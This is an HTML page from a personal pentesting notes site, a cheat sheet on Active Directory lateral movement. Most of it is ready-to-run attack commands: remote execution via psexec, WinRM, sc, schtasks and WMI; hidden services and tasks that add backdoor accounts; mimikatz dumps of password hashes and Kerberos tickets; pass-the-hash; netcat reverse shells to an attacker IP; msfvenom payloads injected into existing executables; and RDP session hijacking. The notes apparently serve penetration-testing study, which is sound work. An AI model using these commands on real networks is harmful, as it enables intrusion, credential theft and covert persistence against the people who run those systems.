husk/build/misc/active_directory/lateral_movement.html

<!doctype html>
<html lang="en">
<center>
<head>
<script src="https://cdn.jsdelivr.net/npm/fuse.js/dist/fuse.js"></script>
<!-- mathjax -->
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="/static/js/auto-complete.js"></script>
<script type="text/javascript" src="/static/js/lunr.min.js"></script>
<script type="text/javascript" src="/static/js/search.js"></script>
<link rel="stylesheet" href="/static/stylesheet.css">
<link rel="stylesheet" href="/static/auto-complete.css">
<br>
<title>In the Open</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
</head>
<body>
<!-- topmenu -->
<div class="menu">
<a href="/" style="text-decoration:none">In the Open</a>
</div>
<div class="search-container">
<label for="search-by"><i class="fas fa-search"></i></label>
<input data-search-input="" id="search-by" type="search" placeholder="Search..." autocomplete="off">
<!--button type="submit"><i class="search"></i>&#128269;</button>-->
<span data-search-clear=""><i class="fas fa-times"></i></span>
</div>
</div>
<div class="menu">
</div>
<!--br><br-->
</center>
<p></p>
<div class="columns">
<!-- Sidebar -->
<div class="column column-1">
<ul><details id=crypto ontoggle="linkClick(this); return false;" ><summary>Crypto</summary><ul><details id=openssl ontoggle="linkClick(this); return false;" ><summary>Openssl</summary><ul><li><a href="/crypto/openssl/openssl.html">openssl</a></li><li><a href="/crypto/openssl/openssl_engine.html">openssl_engine</a></li></ul></details><li><a href="/crypto/rsa.html">rsa</a></li></ul></details><details id=enumeration ontoggle="linkClick(this); return false;" ><summary>Enumeration</summary><ul><details id=containers ontoggle="linkClick(this); return false;" ><summary>Containers</summary><ul></ul></details><details id=docs ontoggle="linkClick(this); return false;" ><summary>Docs</summary><ul><li><a href="/enumeration/docs/aws.html">aws</a></li><li><a href="/enumeration/docs/cewl.html">cewl</a></li><li><a href="/enumeration/docs/dns.html">dns</a></li><li><a href="/enumeration/docs/docker_enumeration.html">docker_enumeration</a></li><li><a href="/enumeration/docs/ffuf.html">ffuf</a></li><li><a href="/enumeration/docs/gobuster.html">gobuster</a></li><li><a href="/enumeration/docs/kerberoast.html">kerberoast</a></li><li><a href="/enumeration/docs/kubectl.html">kubectl</a></li><li><a href="/enumeration/docs/ldap.html">ldap</a></li><li><a href="/enumeration/docs/linux_basics.html">linux_basics</a></li><li><a href="/enumeration/docs/microk8s.html">microk8s</a></li><li><a href="/enumeration/docs/nfs.html">nfs</a></li><li><a href="/enumeration/docs/nikto.html">nikto</a></li><li><a href="/enumeration/docs/nmap.html">nmap</a></li><li><a href="/enumeration/docs/port_knocking.html">port_knocking</a></li><li><a href="/enumeration/docs/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/docs/rsync.html">rsync</a></li><li><a href="/enumeration/docs/rustscan.html">rustscan</a></li><li><a href="/enumeration/docs/shodan.html">shodan</a></li><details id=snmp ontoggle="linkClick(this); return false;" ><summary>Snmp</summary><ul><li><a 
href="/enumeration/docs/snmp/onesixtyone.html">onesixtyone</a></li><li><a href="/enumeration/docs/snmp/snmpcheck.html">snmpcheck</a></li></ul></details><li><a href="/enumeration/docs/websites.html">websites</a></li><li><a href="/enumeration/docs/wfuzz.html">wfuzz</a></li><li><a href="/enumeration/docs/wpscan.html">wpscan</a></li></ul></details><details id=network_scanners ontoggle="linkClick(this); return false;" ><summary>Network_scanners</summary><ul></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/enumeration/windows/bloodhound.html">bloodhound</a></li><li><a href="/enumeration/windows/event_log.html">event_log</a></li><li><a href="/enumeration/windows/manual_enum.html">manual_enum</a></li><li><a href="/enumeration/windows/powershell.html">powershell</a></li><li><a href="/enumeration/windows/rpcclient.html">rpcclient</a></li><li><a href="/enumeration/windows/sysinternals.html">sysinternals</a></li><li><a href="/enumeration/windows/sysmon.html">sysmon</a></li><li><a href="/enumeration/windows/vss.html">vss</a></li></ul></details></ul></details><details id=exfiltration ontoggle="linkClick(this); return false;" ><summary>Exfiltration</summary><ul><details id=dns ontoggle="linkClick(this); return false;" ><summary>Dns</summary><ul><li><a href="/exfiltration/dns/dns.html">dns</a></li></ul></details><details id=linux ontoggle="linkClick(this); return false;" ><summary>Linux</summary><ul><li><a href="/exfiltration/linux/nc.html">nc</a></li><li><a href="/exfiltration/linux/wget.html">wget</a></li></ul></details><details id=windows ontoggle="linkClick(this); return false;" ><summary>Windows</summary><ul><li><a href="/exfiltration/windows/evil-winrm.html">evil-winrm</a></li><li><a href="/exfiltration/windows/loot.html">loot</a></li><li><a href="/exfiltration/windows/smb_connection.html">smb_connection</a></li></ul></details></ul></details><details id=exploit ontoggle="linkClick(this); return false;" 
><summary>Exploit</summary><ul><details id=CPUs ontoggle="linkClick(this); return false;" ><summary>CPUs</summary><ul><li><a href="/exploit/CPUs
</ul>
</div>
<div class="column column-2">
<span class="body">
<style>pre { line-height: 125%; }
td.linenos .normal { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos { color: #37474F; background-color: #263238; padding-left: 5px; padding-right: 5px; }
td.linenos .special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
span.linenos.special { color: #607A86; background-color: #263238; padding-left: 5px; padding-right: 5px; }
.codehilite .hll { background-color: #2C3B41 }
.codehilite .c { color: #546E7A; font-style: italic } /* Comment */
.codehilite .err { color: #FF5370 } /* Error */
.codehilite .esc { color: #89DDFF } /* Escape */
.codehilite .g { color: #EEFFFF } /* Generic */
.codehilite .k { color: #BB80B3 } /* Keyword */
.codehilite .l { color: #C3E88D } /* Literal */
.codehilite .n { color: #EEFFFF } /* Name */
.codehilite .o { color: #89DDFF } /* Operator */
.codehilite .p { color: #89DDFF } /* Punctuation */
.codehilite .ch { color: #546E7A; font-style: italic } /* Comment.Hashbang */
.codehilite .cm { color: #546E7A; font-style: italic } /* Comment.Multiline */
.codehilite .cp { color: #546E7A; font-style: italic } /* Comment.Preproc */
.codehilite .cpf { color: #546E7A; font-style: italic } /* Comment.PreprocFile */
.codehilite .c1 { color: #546E7A; font-style: italic } /* Comment.Single */
.codehilite .cs { color: #546E7A; font-style: italic } /* Comment.Special */
.codehilite .gd { color: #FF5370 } /* Generic.Deleted */
.codehilite .ge { color: #89DDFF } /* Generic.Emph */
.codehilite .gr { color: #FF5370 } /* Generic.Error */
.codehilite .gh { color: #C3E88D } /* Generic.Heading */
.codehilite .gi { color: #C3E88D } /* Generic.Inserted */
.codehilite .go { color: #546E7A } /* Generic.Output */
.codehilite .gp { color: #FFCB6B } /* Generic.Prompt */
.codehilite .gs { color: #FF5370 } /* Generic.Strong */
.codehilite .gu { color: #89DDFF } /* Generic.Subheading */
.codehilite .gt { color: #FF5370 } /* Generic.Traceback */
.codehilite .kc { color: #89DDFF } /* Keyword.Constant */
.codehilite .kd { color: #BB80B3 } /* Keyword.Declaration */
.codehilite .kn { color: #89DDFF; font-style: italic } /* Keyword.Namespace */
.codehilite .kp { color: #89DDFF } /* Keyword.Pseudo */
.codehilite .kr { color: #BB80B3 } /* Keyword.Reserved */
.codehilite .kt { color: #BB80B3 } /* Keyword.Type */
.codehilite .ld { color: #C3E88D } /* Literal.Date */
.codehilite .m { color: #F78C6C } /* Literal.Number */
.codehilite .s { color: #C3E88D } /* Literal.String */
.codehilite .na { color: #BB80B3 } /* Name.Attribute */
.codehilite .nb { color: #82AAFF } /* Name.Builtin */
.codehilite .nc { color: #FFCB6B } /* Name.Class */
.codehilite .no { color: #EEFFFF } /* Name.Constant */
.codehilite .nd { color: #82AAFF } /* Name.Decorator */
.codehilite .ni { color: #89DDFF } /* Name.Entity */
.codehilite .ne { color: #FFCB6B } /* Name.Exception */
.codehilite .nf { color: #82AAFF } /* Name.Function */
.codehilite .nl { color: #82AAFF } /* Name.Label */
.codehilite .nn { color: #FFCB6B } /* Name.Namespace */
.codehilite .nx { color: #EEFFFF } /* Name.Other */
.codehilite .py { color: #FFCB6B } /* Name.Property */
.codehilite .nt { color: #FF5370 } /* Name.Tag */
.codehilite .nv { color: #89DDFF } /* Name.Variable */
.codehilite .ow { color: #89DDFF; font-style: italic } /* Operator.Word */
.codehilite .w { color: #EEFFFF } /* Text.Whitespace */
.codehilite .mb { color: #F78C6C } /* Literal.Number.Bin */
.codehilite .mf { color: #F78C6C } /* Literal.Number.Float */
.codehilite .mh { color: #F78C6C } /* Literal.Number.Hex */
.codehilite .mi { color: #F78C6C } /* Literal.Number.Integer */
.codehilite .mo { color: #F78C6C } /* Literal.Number.Oct */
.codehilite .sa { color: #BB80B3 } /* Literal.String.Affix */
.codehilite .sb { color: #C3E88D } /* Literal.String.Backtick */
.codehilite .sc { color: #C3E88D } /* Literal.String.Char */
.codehilite .dl { color: #EEFFFF } /* Literal.String.Delimiter */
.codehilite .sd { color: #546E7A; font-style: italic } /* Literal.String.Doc */
.codehilite .s2 { color: #C3E88D } /* Literal.String.Double */
.codehilite .se { color: #EEFFFF } /* Literal.String.Escape */
.codehilite .sh { color: #C3E88D } /* Literal.String.Heredoc */
.codehilite .si { color: #89DDFF } /* Literal.String.Interpol */
.codehilite .sx { color: #C3E88D } /* Literal.String.Other */
.codehilite .sr { color: #89DDFF } /* Literal.String.Regex */
.codehilite .s1 { color: #C3E88D } /* Literal.String.Single */
.codehilite .ss { color: #89DDFF } /* Literal.String.Symbol */
.codehilite .bp { color: #89DDFF } /* Name.Builtin.Pseudo */
.codehilite .fm { color: #82AAFF } /* Name.Function.Magic */
.codehilite .vc { color: #89DDFF } /* Name.Variable.Class */
.codehilite .vg { color: #89DDFF } /* Name.Variable.Global */
.codehilite .vi { color: #89DDFF } /* Name.Variable.Instance */
.codehilite .vm { color: #82AAFF } /* Name.Variable.Magic */
.codehilite .il { color: #F78C6C } /* Literal.Number.Integer.Long */</style>
<div class="column column-3">
<ul>
<li><a href="#lateral-movement">Lateral Movement</a><ul>
<li><a href="#remote-processes">Remote Processes</a><ul>
<li><a href="#psexec">psexec</a></li>
<li><a href="#winrm">WinRM</a></li>
<li><a href="#sc">sc</a></li>
<li><a href="#schtasks">schtasks</a></li>
<li><a href="#wmi">wmi</a></li>
</ul>
</li>
<li><a href="#further-authentication-methods">Further Authentication Methods</a><ul>
<li><a href="#ntlm">NTLM</a><ul>
<li><a href="#pass-the-hash">Pass the hash</a></li>
</ul>
</li>
<li><a href="#kerberos">Kerberos</a><ul>
<li><a href="#pass-the-ticket">Pass The Ticket</a></li>
<li><a href="#overpass-the-hash">Overpass The Hash</a></li>
</ul>
</li>
</ul>
</li>
<li><a href="#writeable-shares">Writeable Shares</a></li>
</ul>
</li>
</ul>
</div>
<h1 id="lateral-movement">Lateral Movement</h1>
<ul>
<li>Find credentials with more permissions and use them to move through the network quietly, avoiding detection</li>
<li>Context of connections from A to B with permission C might be suspicious, therefore some bypass has to be found</li>
<li>
<p>Local and network/domain accounts have to be distinguished: UAC is enforced on local admin accounts but not on domain accounts</p>
</li>
<li>
<p><strong>Service executables need their own special reverse shell</strong>, <code>msfvenom</code> file format <code>exe-service</code></p>
</li>
</ul>
<h2 id="remote-processes">Remote Processes</h2>
<h3 id="psexec">psexec</h3>
<ul>
<li>Port <code>445</code></li>
<li><code>SMB</code> protocol</li>
<li>
<p>Group membership: <code>Administrators</code></p>
</li>
<li>
<p>Upload the service binary to the <code>ADMIN$</code> share of the SMB server</p>
</li>
<li>Use <code>psexesvc.exe</code> via service control manager to execute the remote process</li>
<li>Communication will be established through a named pipe</li>
</ul>
<div class="codehilite"><pre><span></span><code>psexec64.exe <span class="se">\\</span>%TARGET_IP% -u Administrator -p %PASSWORD% -i cmd.exe
</code></pre></div>
<h3 id="winrm">WinRM</h3>
<ul>
<li>Ports <code>5985</code> (HTTP) and <code>5986</code> (HTTPS)</li>
<li>
<p>Group Membership: <code>Remote Management Users</code></p>
</li>
<li>
<p>Execute powershell commands on remote targets</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>winrs.exe -u:Administrator -p:%PASSWORD% -r:target cmd
</code></pre></div>
<ul>
<li>Alternatively, run it through PowerShell via</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&quot;Administrator&quot;</span><span class="p">;</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="s2">&quot;SecurePassword&quot;</span><span class="p">;</span>
<span class="nv">$securePassword</span> <span class="o">=</span> ConvertTo-SecureString <span class="nv">$password</span> -AsPlainText -Force<span class="p">;</span>
<span class="nv">$credential</span> <span class="o">=</span> New-Object System.Management.Automation.PSCredential <span class="nv">$username</span>, <span class="nv">$securePassword</span><span class="p">;</span>
Enter-PSSession -Computername TARGET -Credential <span class="nv">$credential</span>
Invoke-Command -Computername TARGET -Credential -ScriptBlock <span class="o">{</span>whoami<span class="o">}</span>
</code></pre></div>
<h3 id="sc">sc</h3>
<ul>
<li>Ports <code>135</code> and <code>49152-65535</code> (DCE/RPC); port <code>135</code> returns the service endpoints on the high ports</li>
<li>Ports <code>139</code> and <code>445</code>: RPC over SMB named pipes, used if SVCCTL over <code>135</code> fails</li>
<li>
<p>Group Membership: <code>Administrators</code></p>
</li>
<li>
<p>Create service remotely via Service Control Manager (RPC) or <code>SVCCTL</code></p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>sc.exe <span class="se">\\</span>%TARGET_IP% create MyService <span class="nv">binPath</span><span class="o">=</span> <span class="s2">&quot;net user newuser securepassword /add&quot;</span> <span class="nv">start</span><span class="o">=</span> auto
sc.exe <span class="se">\\</span>%TARGET_IP% start MyService
sc.exe <span class="se">\\</span>%TARGET_IP% stop MyService
sc.exe <span class="se">\\</span>%TARGET_IP% delete MyService
</code></pre></div>
<h3 id="schtasks">schtasks</h3>
<ul>
<li>Create remote scheduled tasks</li>
</ul>
<div class="codehilite"><pre><span></span><code>schtasks /s TARGET /RU <span class="s2">&quot;SYSTEM&quot;</span> /create /tn <span class="s2">&quot;SteamUpdateService&quot;</span> /tr <span class="s2">&quot;&lt;command/payload to execute&gt;&quot;</span> /sc ONCE /sd <span class="m">01</span>/01/1970 /st <span class="m">00</span>:00
schtasks /s TARGET /run /TN <span class="s2">&quot;SteamUpdateService&quot;</span>
</code></pre></div>
<ul>
<li>Delete scheduled tasks via</li>
</ul>
<div class="codehilite"><pre><span></span><code>schtasks /S TARGET /TN <span class="s2">&quot;SteamUpdateService&quot;</span> /DELETE /F
</code></pre></div>
<h3 id="wmi">wmi</h3>
<ul>
<li>Ports are<ul>
<li>DCOM <code>135</code> RPC and dynamic ports</li>
<li>Wsman <code>5985</code> winrm HTTP and <code>5986</code> winrm HTTPS</li>
</ul>
</li>
<li>
<p>Group membership: <code>Administrators</code></p>
</li>
<li>
<p>To start, use the same credential object as for WinRM</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$username</span> <span class="o">=</span> <span class="s2">&quot;Administrator&quot;</span><span class="p">;</span>
<span class="nv">$password</span> <span class="o">=</span> <span class="s2">&quot;SecurePassword&quot;</span><span class="p">;</span>
<span class="nv">$securePassword</span> <span class="o">=</span> ConvertTo-SecureString <span class="nv">$password</span> -AsPlainText -Force<span class="p">;</span>
<span class="nv">$credential</span> <span class="o">=</span> New-Object System.Management.Automation.PSCredential <span class="nv">$username</span>, <span class="nv">$securePassword</span><span class="p">;</span>
</code></pre></div>
<ul>
<li>Store the session</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Opt</span> <span class="o">=</span> New-CimSessionOption -Protocol DCOM
<span class="nv">$Session</span> <span class="o">=</span> New-Cimsession -ComputerName TARGET -Credential <span class="nv">$credential</span> -SessionOption <span class="nv">$Opt</span> -ErrorAction Stop
</code></pre></div>
<ul>
<li><strong>Spawn a remote process</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Command</span> <span class="o">=</span> <span class="s2">&quot;powershell.exe -Command Set-Content -Path C:\payload.txt -Value itworked&quot;</span><span class="p">;</span>
Invoke-CimMethod -CimSession <span class="nv">$Session</span> -ClassName Win32_Process -MethodName Create -Arguments @<span class="o">{</span>
<span class="nv">CommandLine</span> <span class="o">=</span> <span class="nv">$Command</span>
<span class="o">}</span>
</code></pre></div>
<ul>
<li>Alternatively via</li>
</ul>
<div class="codehilite"><pre><span></span><code>wmic.exe /user:Administrator /password:securepassword /node:TARGET process call create <span class="s2">&quot;cmd.exe /c nc64.exe -e cmd.exe %ATTACKER_IP% %ATTACKER_PORT%&quot;</span>
</code></pre></div>
<ul>
<li><strong>Spawn a remote service</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-CimMethod -CimSession <span class="nv">$Session</span> -ClassName Win32_Service -MethodName Create -Arguments @<span class="o">{</span>
<span class="nv">Name</span> <span class="o">=</span> <span class="s2">&quot;SteamUpdateService&quot;</span><span class="p">;</span>
<span class="nv">DisplayName</span> <span class="o">=</span> <span class="s2">&quot;SteamUpdateService&quot;</span><span class="p">;</span>
<span class="nv">PathName</span> <span class="o">=</span> <span class="s2">&quot;net user gabenewell securepassword /add&quot;</span><span class="p">;</span>
<span class="nv">ServiceType</span> <span class="o">=</span> <span class="o">[</span>byte<span class="o">]</span>::Parse<span class="o">(</span><span class="s2">&quot;16&quot;</span><span class="o">)</span><span class="p">;</span> <span class="c1"># Win32OwnProcess : Start service in a new process</span>
<span class="nv">StartMode</span> <span class="o">=</span> <span class="s2">&quot;Manual&quot;</span>
<span class="o">}</span>
</code></pre></div>
<ul>
<li>Initiate the service</li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Service</span> <span class="o">=</span> Get-CimInstance -CimSession <span class="nv">$Session</span> -ClassName Win32_Service -filter <span class="s2">&quot;Name LIKE &#39;SteamUpdateService&#39;&quot;</span>
Invoke-CimMethod -InputObject <span class="nv">$Service</span> -MethodName StartService
</code></pre></div>
<ul>
<li>Start and stop via</li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-CimMethod -InputObject <span class="nv">$Service</span> -MethodName StopService
Invoke-CimMethod -InputObject <span class="nv">$Service</span> -MethodName Delete
</code></pre></div>
<ul>
<li><strong>Spawn a remote scheduled task</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code><span class="nv">$Command</span> <span class="o">=</span> <span class="s2">&quot;cmd.exe&quot;</span>
<span class="nv">$Args</span> <span class="o">=</span> <span class="s2">&quot;/c net user gabenewell securepassword /add&quot;</span>
<span class="nv">$Action</span> <span class="o">=</span> New-ScheduledTaskAction -CimSession <span class="nv">$Session</span> -Execute <span class="nv">$Command</span> -Argument <span class="nv">$Args</span>
Register-ScheduledTask -CimSession <span class="nv">$Session</span> -Action <span class="nv">$Action</span> -User <span class="s2">&quot;NT AUTHORITY\SYSTEM&quot;</span> -TaskName <span class="s2">&quot;SteamUpdateService&quot;</span>
Start-ScheduledTask -CimSession <span class="nv">$Session</span> -TaskName <span class="s2">&quot;SteamUpdateService&quot;</span>
</code></pre></div>
<ul>
<li>Delete task via</li>
</ul>
<div class="codehilite"><pre><span></span><code>Unregister-ScheduledTask -CimSession <span class="nv">$Session</span> -TaskName <span class="s2">&quot;SteamUpdateService&quot;</span>
</code></pre></div>
<ul>
<li><strong>Install a remote MSI package</strong></li>
</ul>
<div class="codehilite"><pre><span></span><code>msfvenom -p windows/x64/shell_reverse_tcp <span class="nv">LHOST</span><span class="o">=</span><span class="nv">$TARGET_IP</span> <span class="nv">LPORT</span><span class="o">=</span><span class="m">4711</span> -f msi -o steam.msi
</code></pre></div>
<ul>
<li>Upload and run via</li>
</ul>
<div class="codehilite"><pre><span></span><code>Invoke-CimMethod -CimSession <span class="nv">$Session</span> -ClassName Win32_Product -MethodName Install -Arguments @<span class="o">{</span><span class="nv">PackageLocation</span> <span class="o">=</span> <span class="s2">&quot;C:\Windows\steam.msi&quot;</span><span class="p">;</span> <span class="nv">Options</span> <span class="o">=</span> <span class="s2">&quot;&quot;</span><span class="p">;</span> <span class="nv">AllUsers</span> <span class="o">=</span> <span class="nv">$false</span><span class="o">}</span>
</code></pre></div>
<ul>
<li>Alternatively on older systems via</li>
</ul>
<div class="codehilite"><pre><span></span><code>wmic /node:TARGET /user:DOMAIN<span class="se">\U</span>SER product call install <span class="nv">PackageLocation</span><span class="o">=</span>c:<span class="se">\W</span>indows<span class="se">\s</span>team.msi
</code></pre></div>
<h2 id="further-authentication-methods">Further Authentication Methods</h2>
<ul>
<li>NTLM</li>
<li>Kerberos</li>
</ul>
<h3 id="ntlm">NTLM</h3>
<h4 id="pass-the-hash"><strong>Pass the hash</strong></h4>
<ul>
<li>
<p>Retrieve and pass a hash generated from the password</p>
</li>
<li>
<p>Use mimikatz on local SAM</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
token::elevate
lsadump::sam
</code></pre></div>
<ul>
<li>Use mimikatz on lsass</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
token::elevate
sekurlsa::msv
</code></pre></div>
<ul>
<li>Open reverse shell via mimikatz</li>
</ul>
<div class="codehilite"><pre><span></span><code>token::revert
sekurlsa::pth /user:&lt;username&gt;
/domain:&lt;domainname&gt; /ntlm:&lt;hash&gt; /run:<span class="s2">&quot;C:\Windows\temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span>
</code></pre></div>
<ul>
<li>Via RDP</li>
</ul>
<div class="codehilite"><pre><span></span><code>xfreerdp /v:<span class="nv">$TARGET_IP</span> /u:DOMAIN<span class="se">\\</span>&lt;username&gt; /pth:&lt;ntlm-hash&gt;
</code></pre></div>
<ul>
<li>Via psexec</li>
</ul>
<div class="codehilite"><pre><span></span><code>psexec.py -hashes &lt;ntlm-hash&gt; DOMAIN/&lt;username&gt;@%TARGET_IP%
</code></pre></div>
<ul>
<li>Kerberos</li>
</ul>
<div class="codehilite"><pre><span></span><code>evil-winrm -i <span class="nv">$TARGET_IP</span> -u &lt;username&gt; -H &lt;ntlm-hash&gt;
</code></pre></div>
<h3 id="kerberos">Kerberos</h3>
<ul>
<li>Ticket and session key are needed</li>
</ul>
<h4 id="pass-the-ticket">Pass The Ticket</h4>
<ul>
<li>Extract via mimikatz</li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
sekurlsa::tickets /export
</code></pre></div>
<ul>
<li>Extracting a TGS needs only a low-privilege account, extracting a TGT needs administrative privileges</li>
<li>Use the ticket to inject into a current session</li>
</ul>
<div class="codehilite"><pre><span></span><code>kerberos::ptt &lt;ticket&gt;@&lt;domain&gt;.kirbi
</code></pre></div>
<ul>
<li>Check tickets via <code>klist</code></li>
</ul>
<h4 id="overpass-the-hash">Overpass The Hash</h4>
<ul>
<li>Pass the key: the timestamp sent to obtain a TGT is encrypted with the account's key<ul>
<li>Algorithms can be <code>rc4</code>, <code>aes128</code>, <code>aes256</code> or <code>des</code> if enabled</li>
<li>the <code>rc4</code> key is simply the NTLM hash</li>
</ul>
</li>
<li>Use the key to gain the TGT </li>
</ul>
<div class="codehilite"><pre><span></span><code>privilege::debug
sekurlsa::ekeys
</code></pre></div>
<ul>
<li>Open a reverse shell via</li>
</ul>
<div class="codehilite"><pre><span></span><code>sekurlsa::pth /user:Administrator /domain:&lt;domain&gt; /&lt;hash-algorithm&gt;:&lt;hash&gt; /run:<span class="s2">&quot;C:\Windows\Temp\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span>
</code></pre></div>
<h2 id="writeable-shares">Writeable Shares</h2>
<ul>
<li>
<p>Find a shortcut, a script or anything that keeps a connection over the network to a share</p>
</li>
<li>
<p>Reuse a <code>*.vbs</code> via</p>
</li>
</ul>
<div class="codehilite"><pre><span></span><code>CreateObject<span class="o">(</span><span class="s2">&quot;WScript.Shell&quot;</span><span class="o">)</span>.Run <span class="s2">&quot;cmd.exe /c copy /Y \\%TARGET_IP%\share\nc.exe %tmp% &amp; %tmp%\nc.exe -e cmd.exe %ATTACKER_IP% 4711&quot;</span>, <span class="m">0</span>, True
</code></pre></div>
<ul>
<li>Reuse an existing portable executable and inject into it</li>
</ul>
<div class="codehilite"><pre><span></span><code>msfvenom -a x64 --platform windows -x &lt;reused.exe&gt; -k -p windows/meterpreter/reverse_tcp <span class="nv">LHOST</span><span class="o">=</span><span class="nv">$ATTACKER_IP</span> <span class="nv">LPORT</span><span class="o">=</span><span class="m">4711</span> -b <span class="s2">&quot;\x00&quot;</span> -f exe -o &lt;new_reused.exe&gt;
</code></pre></div>
<ul>
<li>Reuse an RDP session. An administrator may have disconnected without logging off, leaving the session open; it can then be reused as that user without a password. To do so, run <code>cmd</code> or <code>powershell</code> as administrator and reuse the session by its name</li>
</ul>
<div class="codehilite"><pre><span></span><code>PsExec64.exe -s cmd.exe
query user
</code></pre></div>
<ul>
<li>Check output and fill in</li>
</ul>
<div class="codehilite"><pre><span></span><code>tscon &lt;ID-of-target&gt; /dest:&lt;my-SESSIONNAME&gt;
</code></pre></div>
<ul>
<li>The session state should be <code>DISC</code>, i.e. a session that was disconnected rather than logged off</li>
<li>Only on Windows Server versions before 2019 does this work without the password</li>
</ul>
</span>
</div>
</div>
<div id="footer">
<p></p>
<center>
&copy; Stefan Friese
</center>
</div>
<script>
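/**
 * Persist the open/closed state of a sidebar <details> element in
 * sessionStorage so that it survives navigation between pages.
 *
 * Wired up via the inline `ontoggle` handlers on the sidebar's <details>
 * elements, which pass the element itself.
 *
 * @param {HTMLDetailsElement} obj - the element whose toggle event fired;
 *   its `id` is used as the storage key and its `open` property as the state.
 * @returns {undefined}
 */
function linkClick(obj) {
  // An element without an id could never be matched back to a node when the
  // state is restored, so do not store an empty key for it.
  if (!obj || !obj.id) {
    return;
  }
  if (obj.open) {
    // setItem overwrites any previous value; no separate removeItem is needed.
    sessionStorage.setItem(obj.id, "open");
  } else {
    sessionStorage.removeItem(obj.id);
  }
}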
//if ( sessionStorage.getItem("opened")) {
// var item = sessionStorage.getItem("opened")
// document.getElementById(item)['open'] = 'open';
//}
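// Restore the sidebar state saved by linkClick(): re-open every <details>
// element whose id is stored in sessionStorage with the value "open".
// Only keys whose value is "open" are honoured, and keys that match no
// element on this page are skipped, so a stale key or one written by another
// script cannot throw on a null element and abort the rest of this script.
// NOTE(review): some sidebar ids are not unique (e.g. `windows`, `dns`), so
// getElementById only ever restores the first element with that id.
const _keys = Object.keys(sessionStorage);
for (const key of _keys) {
  if (sessionStorage.getItem(key) !== "open") {
    continue;
  }
  const details = document.getElementById(key);
  if (details) {
    details.open = true;
  }
}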
// const detailsElement = document.querySelector('.details-sidebar');
// detailsElement.addEventListener('toggle', event => {
// if (event.target.open) {
// console.log('open');
// if (sessionStorage.getItem("opened") && !(sessionStorage.getItem("opened") === detailsElement.id)) {
// sessionStorage.removeItem("opened");
// }
// sessionStorage.setItem("opened", detailsElement.id);
// console.log(detailsElement);
//
// } else {
// console.log('closed');
// sessionStorage.removeItem("opened");
//
// }
// });
//
// async function fetchIndexJSON() {
// const response = await fetch('/index.json');
// const index = await response.json();
// return index;
// }
// // Extract the `q` query parameter
//var queryStringRegex = /[\?&]q=([^&]+)/g;
//var matches = queryStringRegex.exec(window.location.search);
//if(matches && matches[1]) {
// var value = decodeURIComponent(matches[1].replace(/\+/g, '%20'));
//
//
// // fetchIndexJSON()
// // .then(index => { console.log(index['index']);});
// // Load the posts to search
// fetch('/index').then(function(posts) {
// // Remember to include Fuse.js before this script.
//
// var fuse = new Fuse(posts, {
// keys: ['title', 'tags', 'content'] // What we're searching
// });
//
// // Run the search
// var results = fuse.search(value);
// //console.log(results);
//
// // Generate markup for the posts, implement SearchResults however you want.
// // var $results = SearchResults(results);
//
// // Add the element to the empty <div> from before.
//// $('#searchResults').append($results);
// });
//}
</script>
<script type="text/javascript" src="https://cdn.jsdelivr.net/npm/mathjax@2/MathJax.js"></script>
<script src="https://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML" type="text/javascript"></script>
<script type="text/x-mathjax-config">
// MathJax v2 configuration: TeX input, HTML-CSS or native MathML output
// (chosen by MMLorHTML.js), plus the context-menu and zoom extensions.
// NOTE(review): MathJax v2 documents this text/x-mathjax-config block as
// needing to come before the <script> that loads MathJax.js; here it
// follows two MathJax loaders — confirm the settings are actually applied.
MathJax.Hub.Config({
config: ["MMLorHTML.js"],
jax: ["input/TeX", "output/HTML-CSS", "output/NativeMML"],
extensions: ["MathMenu.js", "MathZoom.js"]
});
</script>
</body>
</html>